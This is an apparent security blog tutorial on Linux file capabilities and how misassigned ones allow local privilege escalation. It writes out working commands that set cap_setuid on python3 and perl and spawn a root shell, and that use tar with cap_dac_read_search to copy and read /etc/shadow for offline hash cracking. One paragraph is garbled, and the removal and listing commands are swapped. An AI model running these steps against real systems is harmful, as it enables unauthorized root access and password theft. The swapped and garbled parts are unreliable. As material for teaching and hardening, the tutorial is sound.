In this article we will discuss about the mechanism of “capability” and Privilege escalation by abusing it. As we know when the system
creates a work context for each user where they achieve their tasks with the
privileges that are assigned to them. So, to provide some specific
functionalities, it is necessary for a non-privileged user to sometimes
temporarily acquire a superuser profile to perform a specific task.
This functionality mainly can be achieved by assigning
privileges through sudo, or setuid permissions to an executable file which allows the user to adopt
the role of file owner.
To accomplish same task in more secure way the
system admin uses “capability” which plays an effective role in the security of
Linux based operating systems.
Table of Content
Introduction to Capability
·
What is capability?
·
Difference between capability and SUID.
·
Use of capabilities.
·
List of capability
Abusing capability for Privilege Escalations
·
Python3
·
Perl
·
Tar
Introduction to Capability
What is capability in Linux
Before capabilities, we only had the binary
system of privileged and non-privileged processes and for the purpose of
performing permission checks, traditional UNIX implementations distinguish two
categories of processes: privileged processes that referred as
superuser or root and unprivileged processes (who’s effective UID is
nonzero).
Capabilities are a per-thread attribute that can
be independently enabled and disabled.
Difference between capability and SUID
SUID: SUID stands for set user ID and
allow users to execute the file as the file owner. This is defined as giving
temporary access to a user to run a program/file with the permissions of the
file’s owner rather that the user who runs it. This can easily be detect by the
use of “Find” command. To find all files with SUID set in the current directory we can use-perm
option which will print files only with permissions set to 4000.
Capability:
Security of Linux systems can be improved by using many
actions. One of these measures is called Linux capabilities which are maintained by the kernel. In other word we can say that they
are a little unintelligible but similar in principle to SUID. Linux’s thread
privilege checking is based on capabilities.
Uses of capabilities
Capabilities work by breaking the actions
normally reserved for root down in to smaller portions. The use of capabilities
is only beginning to drop in to user land applications as most system utilities
do not shed their root privileges. Let’s move ahead that how we can use this
permission more into our task.
Limited
user’s permission: As we know Giving
away too many privileges by default will result in unauthorized changes of
data, backdoors and circumventing access controls, just to name a few. So to
overcome with this situation we can simply use capability to limited user’s
permission.
Using a
fine-grained set of privileges: Use of capability can
be more clearly understand by another example. Suppose a web server normally
runs at port 80 and we also know that we need root permissions to start
listening on one of the lower ports (<1024 80.="" 80="" a="" able="" all="" be="" binary="" can="" cap_net_bind_service.="" capability="" daemon="" easier="" giving="" in="" instead="" it="" like="" listen="" much="" needs="" o:p="" of="" on="" open="" permissions="" port="" related="" root="" server="" set="" specific="" the="" this="" to="" up="" way.="" we="" web="" with="">
Working with capability
The operation of capabilities can be achieved by
in many ways. Some of them are listed as below:
Assigning and removing capability: They are usually
set on executable files and are automatically granted to the process when a
file with a capability is executed. The file capability sets are stored in an
extended attribute named as security.capability. This can be done by the use of
attribute CAP_SETCAP capability.
To enable the capability for any file frame
command as shown below:
setcap cap_setuid+ep /home/demo/python3
Simillarly one can also remove file capability by
as below mentioned command.
getcap -r / 2>/dev/null
Reading
capability: There are many files or program to which
capability are predefined so to view that a file has any capability set then
you can simply run command as:
setcap -r /home/demo/python3
If you'd like to find out which capabilities are already set on
your system, you can search your whole file-system recursively with the
following command:
getcap -r
/ 2>/dev/null
List of Capability
On the basis of functionality, the capability is categorized into
total 36 in count. Some of majorly used are shown below.
Abousing Capabilities Privilege Escalations
Python
Capabilities
Suppose the system administrator wants to grant superuser
permission for any binary program, let's say for python3, which should only be
available to a specific user, and admin doesn't want to give SUID or sudo
permission. The admin supposed to used capabilities, for the python3 program
that should be execute by specific user let’s say for user “demo”. This can be
accomplished with following commands on host machine.
which python3
cp /usr/bin/python3 /home/demo/
setcap cap_setuid+ep /home/demo/python3
As result the user demo received the privilege to run python3
program as root, because here admin has upraised the privilege by using
cap_setuid+ep which means all privilege is assign to user for that program. But
if you will try to find 4000 permission files or programs then it might not be
show for /home/dome/python3.
Note: the user home directory should be not
accessible for other user because if it is accessed to other non-root user then
other users will also proficient to take privilege of capabilities set for user
demo.
Exploiting capabilities using python3
Assuming an intruder has compromised the host machine as local
user and spawn the least privilege shell and he looked for system capabilities
and found empty capability (ep) over suid is given python3 for user demo that
means all privilege is assign to user for that program, therefore taking
advantage of this permission he can escalated into high privilege from low
privilege shell.
getcap -r / 2>/dev/null
pwd
ls -al python3
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash
")'
id
Hence you can observe the local user demo has accessed the root
shell as shown in the given image.
We have
another example “perl” which is same as above where the admin supposed to used
capabilities, for the perl program that should be execute by specific user
let’s say for user “demo”. This can be accomplished with following commands on
the host machine.
which perl
cp /usr/bin/perl /home/demo/
setcap cap_setuid+ep /home/demo/perl
As result the user demo received the privilege to run python3
program as root, because here admin has upraised the privilege by using
cap_setuid+ep which means all privilege is assign to user for that program.
Exploiting capabilities using perl
Repeat above step for exploit perl program to escalate the root
privilege:
getcap -r / 2>/dev/null
pwd
ls -al perl
./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec
"/bin/bash";'
id
Tar Capabilities
We have another example “tar” which is same as above where the
admin supposed to used capabilities to extract high privilege file that are
restricted for other users, that should be extract by specific user let’s say
by user “demo”.
Let’s take an example: The admin wants to assign a role, where the
user “demo” can take the backup of files as root, for this task the admin has
set read capability on tar program. This can be accomplished with following
commands on the host machine.
which tar
cp /bin/tar /home/demo/
setcap cap_dac_read_search+ep /home/demo/tar
Exploiting capabilities using tar
Repeat same procedure to escalate the privilege, take the access
of host machine as local user and move ahead for privilege escalation. Since
this time admin has use CAP_DAC_READ_SEARCH that will help us to bypass file
read permission checks and directory read and execute permission checks.
getcap -r / 2>/dev/null
pwd
ls -al tar
In this we try to read shadow file where all system’s user
password hashes are stored for this you have follow below steps.
·
Compress the /etc/shadow in current directory
with the help of tar program.
·
You will get shadow.tar in your current
directory.
·
Extract the shadow.tar and you will get a
directory as “etc/shadow”.
·
Use cat/head/tail or program to read the
hashes of passwords.
./tar cvf shadow.tar /etc/shadow
ls
./tar -xvf shadow.tar
As result you will have “etc/shadow” file your current directory
and you can read the hashes of password as shown here.
tail -8 etc/shadow
A malicious user can break this password using tool such john the
ripper or hash killer etc.
Conclusion:
The system admin should be aware of security loopholes during assigning
such capability which can effect the integrity of kernel that can led to privilege
escalation.
0 comments:
Post a Comment